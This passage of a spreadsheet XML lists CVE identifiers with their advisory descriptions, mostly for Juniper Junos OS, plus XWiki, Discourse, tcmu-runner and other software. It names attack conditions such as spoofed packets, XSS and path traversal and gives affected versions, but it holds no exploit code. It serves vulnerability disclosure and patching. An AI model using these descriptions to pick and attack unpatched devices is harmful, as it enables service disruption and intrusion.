    <t>A Protection Mechanism Failure vulnerability in RPD (routing protocol daemon) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent unauthenticated attacker to cause established IS-IS adjacencies to go down by sending a spoofed hello PDU leading to a Denial of Service (DoS) condition. Continued receipted of these spoofed PDUs will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS All versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R2-EVO; 21.1 versions prior to 21.1R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31363</t>
  </si>
  <si>
    <t>In an MPLS P2MP environment a Loop with Unreachable Exit Condition vulnerability in the routing protocol daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated adjacent attacker to cause high load on RPD which in turn may lead to routing protocol flaps. If a system with sensor-based-stats enabled receives a specific LDP FEC this can lead to the above condition. Continued receipted of such an LDP FEC will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS 19.2 version 19.2R2 and later versions prior to 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S1, 20.1R3; 20.2 versions prior to 20.2R2-S1, 20.2R3; 20.3 versions prior to 20.3R1-S2, 20.3R2. This issue does not affect Juniper Networks Junos OS versions prior to 19.2R2. Juniper Networks Junos OS Evolved All versions prior to 20.1R2-S3-EVO; 20.3 versions prior to 20.3R1-S2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31364</t>
  </si>
  <si>
    <t>An Improper Check for Unusual or Exceptional Conditions vulnerability combined with a Race Condition in the flow daemon (flowd) of Juniper Networks Junos OS on SRX300 Series, SRX500 Series, SRX1500, and SRX5000 Series with SPC2 allows an unauthenticated network based attacker sending specific traffic to cause a crash of the flowd/srxpfe process, responsible for traffic forwarding in SRX, which will cause a Denial of Service (DoS). Continued receipt and processing of this specific traffic will create a sustained Denial of Service (DoS) condition. This issue can only occur when specific packets are trying to create the same session and logging for session-close is configured as a policy action. Affected platforms are: SRX300 Series, SRX500 Series, SRX1500, and SRX5000 Series with SPC2. Not affected platforms are: SRX4000 Series, SRX5000 Series with SPC3, and vSRX Series. This issue affects Juniper Networks Junos OS SRX300 Series, SRX500 Series, SRX1500, and SRX5000 Series with SPC2: All versions prior to 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R2-S1, 20.3R3; 20.4 versions prior to 20.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-31365</t>
  </si>
  <si>
    <t>An Uncontrolled Resource Consumption vulnerability in Juniper Networks Junos OS on EX2300, EX3400 and EX4300 Series platforms allows an adjacent attacker sending a stream of layer 2 frames will trigger an Aggregated Ethernet (AE) interface to go down and thereby causing a Denial of Service (DoS). By continuously sending a stream of specific layer 2 frames an attacker will sustain the Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS EX4300 Series All versions prior to 15.1R7-S7; 16.1 versions prior to 16.1R7-S8; 17.1 versions prior to 17.1R2-S12; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S10, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S2, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2. Juniper Networks Junos OS EX3400 and EX4300-MP Series All versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S9, 18.4R3-S7; 19.1 versions prior to 19.1R2-S3, 19.1R3-S4; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R3-S1; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R2. Juniper Networks Junos OS EX2300 Series All versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.1 versions prior to 19.1R2-S3, 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S7, 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3-S1; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-31366</t>
  </si>
  <si>
    <t>An Unchecked Return Value vulnerability in the authd (authentication daemon) of Juniper Networks Junos OS on MX Series configured for subscriber management / BBE allows an adjacent attacker to cause a crash by sending a specific username. This impacts authentication, authorization, and accounting (AAA) services on the MX devices and leads to a Denial of Service (DoS) condition. Continued receipted of these PPP login request will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-31367</t>
  </si>
  <si>
    <t>A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on PTX Series allows an adjacent attacker to cause a Denial of Service (DoS) by sending genuine BGP flowspec packets which cause an FPC heap memory leak. Once having run out of memory the FPC will crash and restart along with a core dump. Continued receipted of these packets will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS All versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R3-S6; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos Evolved is not affected.</t>
  </si>
  <si>
    <t>CVE-2021-31368</t>
  </si>
  <si>
    <t>An Uncontrolled Resource Consumption vulnerability in the kernel of Juniper Networks JUNOS OS allows an unauthenticated network based attacker to cause 100% CPU load and the device to become unresponsive by sending a flood of traffic to the out-of-band management ethernet port. Continued receipted of a flood will create a sustained Denial of Service (DoS) condition. Once the flood subsides the system will recover by itself. An indication that the system is affected by this issue would be that kernel and netisr process are shown to be using a lot of CPU cycles like in the following example output: user@host&gt; show system processes extensive ... PID USERNAME PRI NICE SIZE RES STATE C TIME WCPU COMMAND 16 root -72 - 0K 304K WAIT 1 839:40 88.96% intr{swi1: netisr 0} 0 root 97 - 0K 160K RUN 1 732:43 87.99% kernel{bcm560xgmac0 que} This issue affects Juniper Networks JUNOS OS on EX2300 Series, EX3400 Series, and ACX710: All versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S9; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R2-S1, 20.3R3; 20.4 versions prior to 20.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-31369</t>
  </si>
  <si>
    <t>On MX Series platforms with MS-MPC/MS-MIC, an Allocation of Resources Without Limits or Throttling vulnerability in Juniper Networks Junos OS allows an unauthenticated network attacker to cause a partial Denial of Service (DoS) with a high rate of specific traffic. If a Class of Service (CoS) rule is attached to the service-set and a high rate of specific traffic is processed by this service-set, for some of the other traffic which has services applied and is being processed by this MS-MPC/MS-MIC drops will be observed. Continued receipted of this high rate of specific traffic will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on MX Series with MS-MPC/MS-MIC: All versions prior to 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S7, 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-3137</t>
  </si>
  <si>
    <t>XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section.</t>
  </si>
  <si>
    <t>CVE-2021-31370</t>
  </si>
  <si>
    <t>An Incomplete List of Disallowed Inputs vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on QFX5000 Series and EX4600 Series allows an adjacent unauthenticated attacker which sends a high rate of specific multicast traffic to cause control traffic received from the network to be dropped. This will impact control protocols (including but not limited to routing-protocols) and lead to a Denial of Service (DoS). Continued receipt of this specific multicast traffic will create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS on QFX5000 and EX4600 Series: All versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S2, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-31371</t>
  </si>
  <si>
    <t>Juniper Networks Junos OS uses the 128.0.0.0/2 subnet for internal communications between the RE and PFEs. It was discovered that packets utilizing these IP addresses may egress an QFX5000 Series switch, leaking configuration information such as heartbeats, kernel versions, etc. out to the Internet, leading to an information exposure vulnerability. This issue affects Juniper Networks Junos OS on QFX5110, QFX5120, QFX5200, QFX5210 Series, and QFX5100 with QFX 5e Series image installed: All versions prior to 17.3R3-S12; 18.1 versions prior to 18.1R3-S13; 18.3 versions prior to 18.3R3-S5; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3-S1; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2;</t>
  </si>
  <si>
    <t>CVE-2021-31372</t>
  </si>
  <si>
    <t>An Improper Input Validation vulnerability in J-Web of Juniper Networks Junos OS allows a locally authenticated J-Web attacker to escalate their privileges to root over the target device. This issue affects: Juniper Networks Junos OS All versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R3-S3; 19.3 versions prior to 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3-S1; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2, 21.1R3; 21.2 versions prior to 21.2R1-S1, 21.2R2;</t>
  </si>
  <si>
    <t>CVE-2021-31373</t>
  </si>
  <si>
    <t>A persistent Cross-Site Scripting (XSS) vulnerability in Juniper Networks Junos OS on SRX Series, J-Web interface may allow a remote authenticated user to inject persistent and malicious scripts. An attacker can exploit this vulnerability to steal sensitive data and credentials from a web administration session, or hijack another user's active session to perform administrative actions. This issue affects: Juniper Networks Junos OS on SRX Series: 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R2-S1, 20.3R3.</t>
  </si>
  <si>
    <t>CVE-2021-31374</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS and Junos OS Evolved devices processing a specially crafted BGP UPDATE or KEEPALIVE message can lead to a routing process daemon (RPD) crash and restart, causing a Denial of Service (DoS). Continued receipt and processing of this message will create a sustained Denial of Service (DoS) condition. This issue affects both IBGP and EBGP deployments over IPv4 or IPv6. This issue affects: Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R1-S4, 19.4R1-S4, 19.4R2-S3, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2; 20.3 versions prior to 20.3R1-S1, 20.3R2. Juniper Networks Junos OS Evolved: 20.3 versions prior to 20.3R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31375</t>
  </si>
  <si>
    <t>An Improper Input Validation vulnerability in routing process daemon (RPD) of Juniper Networks Junos OS devices configured with BGP origin validation using Resource Public Key Infrastructure (RPKI), allows an attacker to send a specific BGP update which may cause RPKI policy-checks to be bypassed. This, in turn, may allow a spoofed advertisement to be accepted or propagated. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S18; 15.1 versions prior to 15.1R7-S9; 17.2 versions prior to 17.2R3-S3; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R2.</t>
  </si>
  <si>
    <t>CVE-2021-31376</t>
  </si>
  <si>
    <t>An Improper Input Validation vulnerability in Packet Forwarding Engine manager (FXPC) process of Juniper Networks Junos OS allows an attacker to cause a Denial of Service (DoS) by sending specific DHCPv6 packets to the device and crashing the FXPC service. Continued receipt and processing of this specific packet will create a sustained Denial of Service (DoS) condition. This issue affects only the following platforms in ACX Series: ACX500, ACX1000, ACX1100, ACX2100, ACX2200, ACX4000, ACX5048, ACX5096 devices. Other ACX platforms are not affected from this issue. This issue affects Juniper Networks Junos OS on ACX500, ACX1000, ACX1100, ACX2100, ACX2200, ACX4000, ACX5048, ACX5096: 18.4 version 18.4R3-S7 and later versions prior to 18.4R3-S8. This issue does not affect: Juniper Networks Junos OS 18.4 versions prior to 18.4R3-S7 on ACX500, ACX1000, ACX1100, ACX2100, ACX2200, ACX4000, ACX5048, ACX5096.</t>
  </si>
  <si>
    <t>CVE-2021-31377</t>
  </si>
  <si>
    <t>An Incorrect Permission Assignment for Critical Resource vulnerability of a certain file in the filesystem of Junos OS allows a local authenticated attacker to cause routing process daemon (RPD) to crash and restart, causing a Denial of Service (DoS). Repeated actions by the attacker will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S7; 19.1 versions prior to 19.1R2-S3, 19.1R3-S5; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R1-S1, 20.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-31378</t>
  </si>
  <si>
    <t>In broadband environments, including but not limited to Enhanced Subscriber Management, (CHAP, PPP, DHCP, etc.), on Juniper Networks Junos OS devices where RADIUS servers are configured for managing subscriber access and a subscriber is logged in and then requests to logout, the subscriber may be forced into a "Terminating" state by an attacker who is able to send spoofed messages appearing to originate from trusted RADIUS server(s) destined to the device in response to the subscriber's request. These spoofed messages cause the Junos OS General Authentication Service (authd) daemon to force the broadband subscriber into this "Terminating" state which the subscriber will not recover from thereby causing a Denial of Service (DoS) to the endpoint device. Once in the "Terminating" state, the endpoint subscriber will no longer be able to access the network. Restarting the authd daemon on the Junos OS device will temporarily clear the subscribers out of the "Terminating" state. As long as the attacker continues to send these spoofed packets and subscribers request to be logged out, the subscribers will be returned to the "Terminating" state thereby creating a persistent Denial of Service to the subscriber. An indicator of compromise may be seen by displaying the output of "show subscribers summary". The presence of subscribers in the "Terminating" state may indicate the issue is occurring. This issue affects: Juniper Networks Junos OS 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R1-S4, 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. This issue does not affect: Juniper Networks Junos OS 12.3 version 12.3R1 and later versions; 15.1 version 15.1R1 and later versions.</t>
  </si>
  <si>
    <t>CVE-2021-31379</t>
  </si>
  <si>
    <t>An Incorrect Behavior Order vulnerability in the MAP-E automatic tunneling mechanism of Juniper Networks Junos OS allows an attacker to send certain malformed IPv4 or IPv6 packets to cause a Denial of Service (DoS) to the PFE on the device which is disabled as a result of the processing of these packets. Continued receipt and processing of these malformed IPv4 or IPv6 packets will create a sustained Denial of Service (DoS) condition. This issue only affects MPC 7/8/9/10/11 cards, when MAP-E IP reassembly is enabled on these cards. An indicator of compromise is the output: FPC ["FPC ID" # e.g. "0"] PFE #{PFE ID # e.g. "1"] : Fabric Disabled Example: FPC 0 PFE #1 : Fabric Disabled when using the command: show chassis fabric fpcs An example of a healthy result of the command use would be: user@device-re1&gt; show chassis fabric fpcs Fabric management FPC state: FPC 0 PFE #0 Plane 0: Plane enabled Plane 1: Plane enabled Plane 2: Plane enabled Plane 3: Plane enabled Plane 4: Plane enabled Plane 5: Plane enabled Plane 6: Plane enabled Plane 7: Plane enabled This issue affects: Juniper Networks Junos OS on MX Series with MPC 7/8/9/10/11 cards, when MAP-E IP reassembly is enabled on these cards. 17.2 version 17.2R1 and later versions; 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R2-S6, 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S1; 18.4 versions prior to 18.4R1-S8, 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-3138</t>
  </si>
  <si>
    <t>In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms.</t>
  </si>
  <si>
    <t>CVE-2021-31380</t>
  </si>
  <si>
    <t>A configuration weakness in the JBoss Application Server (AppSvr) component of Juniper Networks SRC Series allows a remote attacker to send a specially crafted query to cause the web server to disclose sensitive information in the HTTP response which allows the attacker to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-31381</t>
  </si>
  <si>
    <t>A configuration weakness in the JBoss Application Server (AppSvr) component of Juniper Networks SRC Series allows a remote attacker to send a specially crafted query to cause the web server to delete files which may allow the attacker to disrupt the integrity and availability of the system.</t>
  </si>
  <si>
    <t>CVE-2021-31382</t>
  </si>
  <si>
    <t>On PTX1000 System, PTX10002-60C System, after upgrading to an affected release, a Race Condition vulnerability between the chassis daemon (chassisd) and firewall process (dfwd) of Juniper Networks Junos OS, may update the device's interfaces with incorrect firewall filters. This issue only occurs when upgrading the device to an affected version of Junos OS. Interfaces intended to have protections may have no protections assigned to them. Interfaces with one type of protection pattern may have alternate protections assigned to them. Interfaces intended to have no protections may have protections assigned to them. These firewall rule misassignments may allow genuine traffic intended to be stopped at the interface to propagate further, potentially causing disruptions in services by propagating unwanted traffic. An attacker may be able to take advantage of these misassignments. This issue affects Juniper Networks Junos OS on PTX1000 System: 17.2 versions 17.2R1 and later versions prior to 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R2-S8, 18.4R3-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R2-S4, 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2-S1, 20.3R3; 20.4 versions prior to 20.4R1-S1, 20.4R2. This issue does not affect Juniper Networks Junos OS prior to version 17.2R1 on PTX1000 System. This issue affects Juniper Networks Junos OS on PTX10002-60C System: 18.2 versions 18.2R1 and later versions prior to 18.4 versions prior to 18.4R3-S9; 19.1 versions later than 19.1R1 prior to 19.4 versions prior to 19.4R2-S5, 19.4R3-S5; 20.1 versions prior to 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3-S1; 20.4 versions 20.4R1 and later versions prior to 21.1 versions prior to 21.1R2; 21.2 versions 21.2R1 and later versions prior to 21.3 versions prior to 21.3R2. This issue does not affect Juniper Networks Junos OS prior to version 18.2R1 on PTX10002-60C System. This issue impacts all filter families (inet, inet6, etc.) and all loopback filters. It does not rely upon the location where a filter is set, impacting both logical and physical interfaces.</t>
  </si>
  <si>
    <t>CVE-2021-31383</t>
  </si>
  <si>
    <t>In Point to MultiPoint (P2MP) scenarios within established sessions between network or adjacent neighbors the improper use of a source to destination copy write operation combined with a Stack-based Buffer Overflow on certain specific packets processed by the routing protocol daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved sent by a remote unauthenticated network attacker causes the RPD to crash causing a Denial of Service (DoS). Continued receipt and processing of these packets will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2. This issue does not affect Juniper Networks Junos OS versions prior to 19.2R1. Juniper Networks Junos OS Evolved 20.1 versions prior to 20.1R3-EVO; 20.2 versions prior to 20.2R3-EVO; 20.3 versions prior to 20.3R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31384</t>
  </si>
  <si>
    <t>Due to a Missing Authorization weakness and Insufficient Granularity of Access Control in a specific device configuration, a vulnerability exists in Juniper Networks Junos OS on SRX Series whereby an attacker who attempts to access J-Web administrative interfaces can successfully do so from any device interface regardless of the web-management configuration and filter rules which may otherwise protect access to J-Web. This issue affects: Juniper Networks Junos OS SRX Series 20.4 version 20.4R1 and later versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.4R1.</t>
  </si>
  <si>
    <t>CVE-2021-31385</t>
  </si>
  <si>
    <t>An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in J-Web of Juniper Networks Junos OS allows any low-privileged authenticated attacker to elevate their privileges to root. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S19; 15.1 versions prior to 15.1R7-S10; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-31386</t>
  </si>
  <si>
    <t>A Protection Mechanism Failure vulnerability in the J-Web HTTP service of Juniper Networks Junos OS allows a remote unauthenticated attacker to perform Person-in-the-Middle (PitM) attacks against the device. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S20; 15.1 versions prior to 15.1R7-S11; 18.3 versions prior to 18.3R3-S6; 18.4 versions prior to 18.4R3-S10; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R3-S4; 19.3 versions prior to 19.3R3-S4; 19.4 versions prior to 19.4R3-S6; 20.1 versions prior to 20.1R3-S2; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S1; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-3139</t>
  </si>
  <si>
    <t>In Open-iSCSI tcmu-runner 1.3.x, 1.4.x, and 1.5.x through 1.5.2, xcopy_locate_udev in tcmur_cmd_handler.c lacks a check for transport-layer restrictions, allowing remote attackers to read or write files via directory traversal in an XCOPY request. For example, an attack can occur over a network if the attacker has access to one iSCSI LUN. NOTE: relative to CVE-2020-28374, this is a similar mistake in a different algorithm.</t>
  </si>
  <si>
    <t>CVE-2021-31399</t>
  </si>
  <si>
    <t>On 2N Access Unit 2.0 2.31.0.40.5 devices, an attacker can pose as the web relay for a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVE-2021-31400</t>
  </si>
  <si>
    <t>An issue was discovered in tcp_pulloutofband() in tcp_in.c in HCC embedded InterNiche 4.0.1. The TCP out-of-band urgent-data processing function invokes a panic function if the pointer to the end of the out-of-band data points outside of the TCP segment's data. If the panic function hadn't a trap invocation removed, it will enter an infinite loop and therefore cause DoS (continuous loop or a device reset).</t>
  </si>
  <si>
    <t>CVE-2021-31401</t>
  </si>
  <si>
    <t>An issue was discovered in tcp_rcv() in nptcp.c in HCC embedded InterNiche 4.0.1. The TCP header processing code doesn't sanitize the value of the IP total length field (header length + data length). With a crafted IP packet, an integer overflow occurs whenever the value of the IP data length is calculated by subtracting the length of the header from the total length of the IP packet.</t>
  </si>
  <si>
    <t>CVE-2021-31402</t>
  </si>
  <si>
    <t>The dio package 4.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.</t>
  </si>
  <si>
    <t>CVE-2021-31403</t>
  </si>
  <si>
